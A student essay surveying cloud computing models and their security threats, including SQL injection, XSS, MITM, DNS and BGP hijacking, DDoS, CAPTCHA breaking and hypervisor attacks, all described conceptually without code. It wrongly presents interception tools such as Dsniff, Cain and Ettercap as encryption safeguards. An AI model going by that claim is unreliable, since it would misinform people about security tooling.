Next generation architecture

Published: Last Edited:

This essay has been submitted by a student. This is not an example of the work written by our professional essay writers.


Cloud Computing has been envisioned as the next generation architecture of IT Enterprise and a new computing paradigm to users as it promises to provide a flexible IT infrastructure, accessible through Internet over lightweight portable devices, allowing multi-fold increase in capacity or capabilities and new licensing software on the fly without additional investment, meeting the user's needs and requirements. If looked into greater depth it can be observed that in a cloud computing environment the IT services along with the program and user data are moved to the large data centres beyond the reach of the users, where the management of the data and services may not be fully trustworthy. This unique attribute, however, poses manifold security and privacy challenges, which have not been well understood and has become a subject of discussion among the modern day researchers. Since its inception into the computing world it has underwent many challenges and has survived the various threats that blocked its way. Still there are multifarious issues that are to be dealt with respect to security and privacy in a cloud computing scenario. In this article we have tried to elaborate the multifarious security issues that still haunt the privacy and integrity of users in the cloud.

Keywords - Software as a Service (SaaS), Platform as a Service (PaaS), Infrastructure as a Service (IaaS), Interoperability, Denial of Service (DoS), Distributed Denial of Service (DDoS), Captcha, BGP prefix hijacking.


The computing world has evolved rapidly over the years. Starting with the advent of the mainframe computers, quite bulky in size allowing the data transfer through floppy disks or magnetic disks from one system to other, there came minicomputers which paved the way for personal computers, that brought processing power to the individual's desktop with basic applications like Word documents and spreadsheets. The personal computing revolution became portable with laptops, handheld devices and smart phones.

As the time passed on, IT industry has also progressed and with every evolutionary step, computer's underlying architecture became more distributed. The inception of internet in the computing world created a major difference between the then IT industry and the world before the adoption of Internet. Internet has narrowed the communication gap and provided services that could solve any problem within seconds. The last few years have seen the rise of such a computing aura that has led to a more distributed computing environment, while also reviving the utility of centralized storage. The growth in high speed data lines, reduced storage cost, advent of high speed wireless networks, proliferation of handheld devices able to access the web have given way to the much hyped technological era of Cloud computing.

A plethora of definitions have been given explaining the cloud computing. Cloud Computing, [7] [12] [16] has been defined as the new state of the art technique able to provide a flexible IT infrastructure, integrating the features supporting high scalability and multi-tenancy such that users need not own the infrastructure supporting these services. Moreover cloud computing minimizes the capital expenditure and is device and location independent as the internet services being used for the deployment of a cloud computing platform can be accessed from anywhere in the world. It is viewed as the new generation technology expected to take the IT world to a new height where the whole world will communicate through network based services.

Another definition says: "Cloud Computing represents the integration of technology and business developments on the Internet, allowing users to use applications and services provided and access personal information through any system supporting internet connectivity [17]. Cloud computing renders users with services to access on various service platforms such as: SaaS, PaaS, IaaS, HaaS, IMPaaS etc." SaaS: Software as a service [3] [7] [12] ensures that the complete applications are hosted on the internet and the users use them, payment being made on a pay-per-use model. It eliminates the need to install and run the application on the customer's local computer, thus alleviating the customer's burden for software development and maintenance.

In the Platform as a service approach (PaaS) [7] [8] the offering also includes a software execution environment such as an application server enabling the lone developers and start-up companies to deploy web-based applications without the cost and complexity of buying servers and setting them up. Hence we can say that PaaS refers to providing a development platform to the start-ups (major) to develop, deploy, host and maintain the applications.

Infrastructure as a service (IaaS) [7] [8] refers to the sharing of hardware resources for executing services, typically using Virtualization technology. With this so-called Infrastructure as a Service (IaaS) approach, potentially multiple users use existing resources. The resources can easily be scaled up depending on the demand from user and they are typically charged for on a pay-per-use basis.

Cloud Computing distinguishes itself from other computing paradigms like: grid computing, global computing, internet computing in the various aspects of On Demand Service Provision, User Centric Interfaces, guaranteed QoS, Autonomous system [5] etc. A few state of the art techniques [7] [12] that contribute to the cloud computing are:

  • Virtualization: It has been the underlying concept towards such a huge rise of cloud computing in the modern era. The term refers to providing an environment able to render all the services, being supported by a hardware that can be observed on a personal computer, to the end users. The three existing forms of virtualization categorized as: Server virtualization, Storage and network virtualization have inexorably lead to the evolution of Cloud computing.
  • Web Service and SOA: Web services provided services over the web using technologies like XML, Web Services Description Language (WSDL), Simple Object Access Protocol (SOAP), and Universal Description, Discovery, and Integration (UDDI). The service organisation inside a cloud is managed in the form of Service Oriented Architecture (SOA).
  • Application Programming Interface (API): Without API's it's hard to believe the existence of cloud computing. The whole bunch of cloud services depend on API's and allow deployment and configuration through them. Based on the API category used viz. Control, Data and Application API's different functions are being controlled and services rendered to the users.
  • Web 2.0 and mash-up: Web 2.0 symbolizes the trend in the use of world-wide web technology and web design to enhance creativity, information sharing and collaboration among users. Mash-up is a web application that combines data from more than one source into a single integrated storage tool.

These were the few technological advances that led to the emergence of Cloud Computing and enabled a lot of service providers to provide the customers a hassle free world of virtualization fulfilling all their demands. The prominent ones are: Amazon- EC2 (Elastic Compute Cloud), S3 (Simple Storage Service), SQS (Simple Queue Service), CF (Cloud Front), SimpleDB; Google, Microsoft, ProofPoint, RightScale,, Workday, Sun Microsystems etc and each of them are categorised either as one of the three main classifications based on the cloud structure they provide: private, public and hybrid cloud. Each of the above mentioned cloud structure has its own limitations and benefits [7].

Although the enormous growth done in this field has changed the way computing world was looked at, moreover the IT sector has witnessed the change in the way situations were handled and has marked the reversal of a long standing trend as observed to begat the new technological era but still there are issues that are same as forever and yet more compelling now. With an avalanche rise towards the deployment of Cloud Computing, the ever consistent security and privacy issues have become more sophisticated, more distributed in the sense that the user section for such services is growing leaps and bounds. In order to maintain various security and privacy issues like: confidentiality, operational integrity, disaster recovery and identity management, following schemes [15] should be there at least to ensure data security to some extent like:

  • An encryption scheme to ensure data security in a highly interfering environment maintaining security standards against popular threats and data storage security.
  • Stringent access controls to prevent unauthorized and illegal access to the servers controlling the network.
  • Data backup and redundant data storage to make data retrieval easy on any type of loss.

From the perspective of data security, which has always been an important aspect of cloud computing, it does give rise to a number of security threats because of following reasons. Firstly, traditional techniques cannot be adopted as they have become quite obsolete with respect to the ever evolving security threats and also to avoid data loss in a cloud computing environment. Secondly, data stored in the cloud is not just merely stored rather it gets accessed a large number of times and changes in the form of insertion and deletion takes place from time to time.

This paper is aimed at developing an understanding of the manifold security threats that do hamper the security and privacy of a user.


Although, the hype surrounding cloud computing is at its peak, still there are certain aspects that cannot be ignored and are limiting the technical heights that can be achieved. Regardless the cumulus aura surrounding the topic we are better not ignoring the loopholes in its architecture that has made it vulnerable to various security and privacy threats. A few issues limiting the boundaries of this transformational concept are:


The fundamental factor defining the success of any new computing technology resides on the term how much secure it is. Whether the data residing in the cloud is secure to a level as to avoid any sort of security breach or it is more secure to store the data away from cloud in our own personal computers or hard drives? At-least we can access our hard drives and systems whenever we wish to, but cloud servers could potentially reside anywhere in the world and we need to have internet connectivity to login to access the data in the cloud servers. Although the cloud service providers insist that their servers and the data stored in them is sufficiently protected from any sort of invasion and theft. Such companies argue that the data on their servers is inherently more secure than data residing on a myriad of personal computers and laptops, but also admit the fact that out data will be distributed over these individual computers regardless of where the base repository of data is ultimately stored. There have been instances when their security has been invaded and the whole system had been down for hours. At-least half a dozen of security breaches occurred last year bringing out the fundamental lapses in the security model of major CSP. Information requiring privacy and the various privacy challenges need the specific steps to be taken in order to ensure privacy in the cloud as discussed [4] [8].


Latency [8] has always been an issue in cloud computing (however minimal it is) with data expected to flow around different clouds. The other factors that add to the latency are encryption and decryption of the data when it moves around unreliable and public networks. Moreover the performance of the system is also a factor that should be taken into account. Sometimes the cloud service providers' run short of capacity either by allowing access to too many virtual machines or overloading their Internet links because of high demand arising from the customer section. This hurts the system performance and adds to latency of the system.


There are cases when companies can't move their data and applications if they find another cloud platform they like better than the one they are using. Also some companies use different cloud platforms for different applications based on their requirements and the services provided by the cloud service providers (CSPs). In some cases different cloud platforms are used for a particular application or different cloud platforms have to interact with each other regarding a particular task and for that interoperability between different cloud platforms and the company's internal infrastructure is needed to maintain a balance as discussed in [2].

Thus we see that although the buzz of cloud computing prevails everywhere because of the multi-fold features and facilities provided by it, still there are issues that are needed to be solved in order to reach the landmarks set by it as to gain access to the hardware and application resources for a better functioning IT world.


The chief concern in cloud environments is security around multi-tenancy and isolation, giving customers more comfort besides "trust us" has to be a good thing. Security at different levels such as Network level, Host level and application level is necessary to keep the cloud up and running continuously. And in accordance to the above mentioned different levels there exists different types of threats and numerous security concerns as discussed:


Web 2.0, a key technology towards enabling the use of Software as a Service (SaaS) making the users free from the tasks of maintenance and software installation has been used widely all around. As the user section making use of it is increasing by leaps and bounds the security has become more important than ever in such an environment. SQL injection attacks, are the one in which a malicious code is inserted to a standard SQL code and thus the attackers gain unauthorized access to a database and become able to access sensitive information. Sometimes the hacker's input data is misunderstood by the web-site as the user data and allows it to be accessed by the SQL server and this lets the attacker to have know-how of the functioning of the website and make changes into that. Various techniques like: avoiding the usage of dynamically generated SQL in the code, using filtering techniques to sanitize the user input etc to check the SQL injection attacks.

Cross Site Scripting (XSS) attacks [21], which inject malicious scripts into Web contents have become quite popular since the inception of Web 2.0. Based, on the type of services provided a website can be classified as static or dynamic. Static websites do not suffer from the security threats which the dynamic websites do because of their dynamic nature in providing multi-fold services to the users.

As a result these dynamic websites get victimized by XSS attacks. It has been observed quite often that amidst working on net or surfing, some web-pages or pop-ups get opened up with the request of being clicked away to view the content contained in them. More often either unknowingly (about the possible hazards) or out of curiosity users click on these hazardous links and thus the intruding third party gets control over the user's private information or hack their accounts after having known the information available to them. Various techniques like: Active Content Filtering, Content Based data Leakage Prevention Technology, Web Application Vulnerability Detection Technology have already been proposed [10]. These technologies adopt various methodologies to detect security flaws and try to fix them out based on them.

Another type of attacks quite popular to SaaS is termed as Man in the Middle attacks (MITM). In such an attack [22] an intruder tries to get intruded in an ongoing conversation between a sender and a client to inject false information and to have knowledge of the important data transferred between them. Various tools implementing strong encryption technologies like: Dsniff, Cain, Ettercap, Wsniff, Airjack etc have been developed in order to provide safeguard against them. A detailed study towards preventing man in the middle attacks has been presented in [9].

A few of the important points like: evaluating software as a service security, separate endpoint and server security processes, evaluating virtualization at the end-point have been mentioned by Eric Ogren, recently in an article at to modify traditional security, tackle flaws [11].

Hence security at different levels is necessary in order to ensure proper implementation of cloud computing such as: server access security, internet access security, database access security, data privacy security and program access security. In addition we need to ensure data security at network layer, data security at physical and application layer to maintain a secure cloud.


Networks are classified into many types like: shared and non-shared, public or private, small area or large area networks and each of them have a number of security threats to deal with. To ensure network security following points such as: confidentiality and integrity in the network, proper access control and maintaining security against the external third party threats should be considered while going for providing network level security.

Problems associated with the network level security [7] comprise of: DNS attacks, issue of reused IP address, Denial of Service (DoS) and Distributed Denial of Service attacks (DDoS) etc.


A Domain Name Server (DNS) server performs the translation of a domain name to an IP address. Since the domains names are much more easy to remember and hence the need of DNS server. But there are cases when having called the server by name, the user has been routed to some other evil cloud instead of the one he asked for and hence using IP address is not always feasible. Although using DNS security measures like: Domain Name System Security Extensions (DNSSEC) reduces the affects of DNS threats but still there are cases when these security measures prove to be ineffective when the path between a sender and a receiver gets rerouted through some evil connection. It may happen that all the DNS security measures are taken; still the route selected between the sender and receiver causes security problems. Such a case has already been discussed in [6].


Each system of a network is provided an IP address and hence an IP address is basically a finite quantity. Last year many cases came into light related to re-used IP-address issue. When a particular user moves out of a network then the IP-address associated with him (earlier) is assigned to a new user. This sometimes risks the security of the new user as there is a certain time lag between the change of an IP address in DNS and the clearing of that address in DNS caches. And hence we can say that sometimes though the old IP address is being assigned to a new user still the chances of accessing the data by some other user is not negligible as the address still exists in the DNS cache and the data belonging to a particular user may get accessible to some other user restricting the privacy of the original user.


Prefix hijacking is a type of network attack in which a wrong announcement related to the IP addresses associated with an Autonomous system (AS) is made and hence malicious parties get access to the untraceable IP addresses. On the internet, IP space is associated in blocks and remains under the control of AS's. An autonomous system can broadcast information of an IP contained in its regime to all its neighbours.

These AS communicate with each other using the Border Gateway Protocol (BGP) model. Sometimes when due to some error a faulty AS broadcast wrongly about the IPs associated with it, in such a case the actual traffic that should get routed to the IP related gets routed to some other IP and hence data gets leaked or reaches to some other destination that it actually should not.


Application level security [7] refers to the usage of software and hardware resources to provide security to applications such that the attackers are not able to get control over these applications and make desirable changes to their format. The threats to application level security include XSS attacks, SQL injection attacks, DoS attacks, CAPTCHA Breaking etc resulting from the unauthorized usage of the applications.


A DoS attack is an attempt to make the services assigned to the authorized users unable to be used by them. In such an attack the server providing the service is flooded by a large number of requests and hence the service becomes unavailable to the authorized user. Sometimes when we try to access a site we see that due to overloading of the server with the requests to access the site, we are unable to access the site and observe an error. This happens when the number of requests that can be handled by a server exceeds its capacity [18].


DDoS [18] may be called an advanced version of DOS in terms of denying the important services running on a server by flooding the destination sever with an umpteen number of packets such that the target server is not able to handle it. In DDoS the attack is relayed from different dynamic networks which have already been compromised unlike DOS.

The DDoS attack is run by the three functional units: A Master, A Slave and A Victim. Mater being the attack launcher is behind all these attacks causing DDoS, Slave is the network which acts like a launch pad for the Master i.e. it provides the platform to the Master to launch the attack on the Victim. Hence it is also called as co-ordinated attack.

Basically a DDoS attack is operational by means of two stages: the first one being Intrusion phase where the Master tries to compromise less important machines to support in flooding the more important one. The next one is installing DDoS tools and attacking the Victim server or machine .

Hence a DDoS attack results in making the service unavailable to the authorized user similar to the way it is done in a DoS attack but different in the way it is launched.


CAPTCHA's were developed in order to prevent the usage of internet resources by bots or computers. They are used to prevent spam and overexploitation of network resources by bots. Even the multiple web-site registrations, dictionary attacks etc by an automated program are prevented using a CAPTCHA.

But recently, it has been found that the spammers are able to break the CAPTCHA [14], provided by the Hotmail and G-mail service providers. They make use of the audio system able to read the CAPTCHA characters for the visually impaired users and use speech to text conversion software to defeat the test. In yet another instant of CAPTCHA Breaking it was found that the net users are provided some form of motivation towards solving these CAPTCHA's by the automated systems and thus CAPTCHA Breaking takes place.


Google has emerged as the best option for finding details regarding anything on the net. Google hacking refers to using Google to find sensitive information that a hacker can use to his benefit while hacking a user's account. Generally hackers try to find out the security loopholes by probing out on Google about the system they wish to hack and then after having gathered the necessary information they carry out the hacking of the concerned system. In some cases a hacker is not sure of the target, instead he tries to Google out the target based on the loophole he wishes to hack a system upon. The hacker then searches all the possible systems with such a loophole and finds out those having the loopholes he wishes to hack upon.


Cloud Computing rests mainly on the concept of virtualization. In a virtualized world, hypervisor is defined as a controller popularly known as virtual machine manager (VMM) that allows multiple operating systems to be run on a system at a time, providing the resources to each operating system such that they do not interfere with each.

As the number of operating systems running on a hardware unit gets increased, the security issues concerned with those that of new operating systems also need to be considered. Because multiple systems would be operating on a single system it is not possible to keep track of all and hence maintaining all the operating systems secure is a tough job. It may happen that a guest system tries to run a malicious code on the host system and bring the system down or take full control of the system and block access to other guest operating systems [13].

The security with respect to hypervisor is of great concern as all the guest systems are controlled by it. If a hacker is able to get control over the hypervisor he can make changes to any of the guest operating systems and gets control over all the data passing through the hypervisor.


Many cloud service providers provide storage as a form of service. They take the data from the users and store them on large data centres, hence providing users a means of storage. Although these cloud service providers say that the data stored in the cloud is utmost safe but there have been cases when the data stored in these clouds have been modified or lost may be due to some security breach or some human error.

Various cloud service providers adopt different technologies to safeguard the data store in their cloud. But the question is: Whether the data stored in these clouds is secure enough against any sort of security breach? These service providers use different encryption techniques like public key encryption and private key encryption to secure the data resting in the cloud. A similar technique providing data storage security, utilizing the homo-morphic token with distributed verification of erasure-coded data has been discussed in [1].

An incident relating to the data loss occurred last year with the online storage service provider "Media max" also known as "The Linkup" when due to system administration error active customer data was deleted, leading to the data loss. Hence it must be ensured that redundant copies of the user data should be stored in order to handle any sort of adverse condition leading to data loss.


In order to secure the cloud against the various security threats and attacks like: SQL injection, Cross Site Scripting (XSS) attacks, DoS and DDoS attacks, Google Hacking and Forced Hacking different cloud service providers adopt different techniques. A few standard techniques in order to detect the above mentioned attacks are as: Avoiding the usage of dynamically generated SQL in the code, finding the meta-structures used in the code, validating all user entered parameters, disallowing unwanted data and characters and then removing them.

A Google hacking database identifies the various types of information such as: login passwords, pages containing logon portals, session usage information etc. Various software modules such as Web Vulnerability Scanner can be used to detect the possibility of a Google hack. In order to prevent Google hack the user need to ensure that only those information that do not cause any affect on the him should be shared with the Google preventing the sharing of any sensitive information that may result in adverse conditions.

The symptoms to a DoS or DDoS attack are: system speed gets reduced and programs run very slowly, large number of connection requests from a large number of users, less number of available resources. Although when launched in full strength DDoS attacks are very harmful as they exhaust all the network resources still a careful monitoring of the network can help in keeping these attacks in control.

In case of IP spoofing an attacker tries to spoof the users that the packets are coming from reliable sources. Thus the attacker takes control over the client's data or system showing himself as the trusted party. Spoofing attacks can be checked by: using encryption techniques and performing user authentication based on Key exchange. Techniques like IPsec do help in mitigating the risks of spoofing. By enabling encryption sessions and performing filtering at the incoming and outgoing entrances spoofing attacks can be reduced.

Moreover we need to ensure that security against the virtual threats should also be maintained by adopting the following methodologies such as: keeping in check the virtual machines connected to the host system and constantly monitoring their activity, securing the host computers to avoid tampering or file modification when the virtual machines are offline, preventing attacks directed towards taking control of the host system or other virtual machines on the network etc.

The security breach of Twitter [20] and (via a zero-day vulnerability) [19] last year have made clear that stringent security measures are needed to be taken in order to ensure security and proper data control in the cloud.

Thus we see that the security model adopted by a Cloud service provider should safeguard the cloud against all the possible threats and ensure that the data residing in the cloud doesn't get lost due to some unauthorized control over the network by some third party intruder.


Cloud Computing has become quite popular and is currently seen as the face of IT industry in the coming days. Although it has revolutionized the computing world but is prone to manifold security threats varying from network level threats to application level threats. In order to maintain the Cloud secure these security threats need to be controlled. Moreover data residing in the cloud is also prone to a number of threats and various issues like confidentiality and integrity of data should be considered while buying storage services from a cloud service provider. Moreover proper auditing of the cloud also needs to be done to safeguard the cloud against external threats. In this paper various security concerns related to the three basic services provided by a Cloud computing environment are considered and the solutions to prevent them have been discussed.


  1. Cong Wang, Qian Wang, Kui Ren, and Wenjing Lou, "Ensuring Data Storage Security in Cloud Computing," 17th International workshop on Quality of Service, IWQoS, pp. 1-9, July 2009.
  2. Marios D. Dikaiakos, Dimitrios Katsaros, Pankaj Mehra, George Pallis, Athena Vakali, "Cloud Computing: Distributed Internet Computing for IT and Scientific Research," IEEE Internet Computing, pp. 10-13, September 2009
  3. R. Maggiani, Communication Consultant, Solari Communication, "Cloud Computing is Changing How we Communicate," IEEE International Professional Conference, IPCC, pp. 1-4, 2009.
  4. S. Pearson, "Taking account of privacy when designing cloud computing services," ICSE Workshop on Software Engineering Challenges of Cloud Computing, pp. 44-52, May 2009.
  5. Lizhe Wang, Jie Tao, Kunze M., Castellanos A.C., Kramer D., Karl W., "Scientific Cloud Computing: Early Definition and Experience," 10th IEEE Int. Conference on High Performance Computing and Communications, pp. 825-830, Sept. 2008.
  6. Char Sample, Senior Scientist, BBN Technologies, Diana Kelley, Partner, Security Curve, "Cloud computing security: Routing and DNS security threats,",289483,sid14_gci1359155_mem1,00.html
  7. Tim Mather, Subra Kumaraswamy, Shahed Latif, "Cloud Security and Privacy: An Enterprise Perspective in Risk and Compliance," Published by O Reilly Media, September 2009.
  8. Neal Levitt, "Is Cloud Computing Really Ready for Prime Time?" pp. 15-20, January 2009.
  9. Jonathan Katz, "Efficient Cryptographic Protocols Preventing Man In The Middle Attacks," Thesis Submission at Columbia University
  10. Web 2.0/SaaS Security
  11. Eric Ogren, "Whitelists SaaS modify traditional security, tackle flaws".,294698,sid14_gci1368647,00.html
  12. Hakan Erdogmus, "Cloud Computing: Does Nirvana Hide behind the Nebula?," IEEE Computer Society in IEEE Software, pp. 4-6, March 2009.
  13. Daniel Petri, "What You Need to Know About Securing Your Virtual Network,"
  14. John E. Dunn, "Spammers break Hotmail's CAPTCHA yet again", Tech-world, published on 16th Feb. 2009.
  15. Lori M. Kaufman, "Data security in the world of cloud computing," IEEE Security and Privacy, pp. 61-64, July 2009.
  16. Cloud Computing, "Wiki-pedia"
  17. Geng Lin, David Fu, Jinzy Zhu, Glenn Dasmalchi, "Cloud Computing: IT as a Service," Published by IEEE Computer Society in IT Professional, pp. 10-13, March 2009.
  18. Argyris Argyrou, "Denial of Service Attacks", Information Systems Audit and Controls, aproject Paper, May 2004.
  19. Dan Goodin, "Webhost hack wipes out data for 100,000 sites," Posted at, 8th June 2009.
  20. Josh Lowensohn, Caroline McCarthy, "Lessons from Twitter's security breach," Cnet News, July 2009.
  21. Steven Cook, "A Web Developer's Guide to Cross Site Scripting Attacks," SANS, Jan. 2003.
  22. Bruce Schneier, "Man in the Middle Attacks," 15th July 2008,